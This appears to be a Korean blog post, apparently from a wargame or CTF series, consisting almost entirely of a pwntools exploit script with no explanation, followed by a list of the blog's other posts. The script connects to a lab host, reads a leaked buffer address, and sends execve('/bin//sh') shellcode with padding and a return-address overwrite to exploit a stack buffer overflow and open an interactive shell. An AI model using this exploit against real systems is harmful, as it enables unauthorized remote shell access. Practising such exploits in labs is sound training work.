728x90
from pwn import *
context.log_level = "debug"
p = remote('10.10.194.218', 9004)
shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
#p = process()
p.recv()
output = p.recv()
buffer_address = int(output.split(b"at")[1].strip().decode("utf-8"), 16)
payload = shellcode + b'A'*(0x50 - len(shellcode)) + b'B'*0x8 + p64(buffer_address)
p.sendline(payload)
p.interactive()
728x90
'호그와트' 카테고리의 다른 글
| 단팥죽 한 그릇 하실라예? 오 (0) | 2022.11.24 |
|---|---|
| 원더랜드에 오신 것을 환영합니다 (0) | 2022.11.21 |
| 제 주문은 콤비네이션인데요 (0) | 2022.11.18 |
| 우리 집에서 바이너리 보구 갈래? 2 (0) | 2022.11.18 |
| 에이전트 (0) | 2022.11.18 |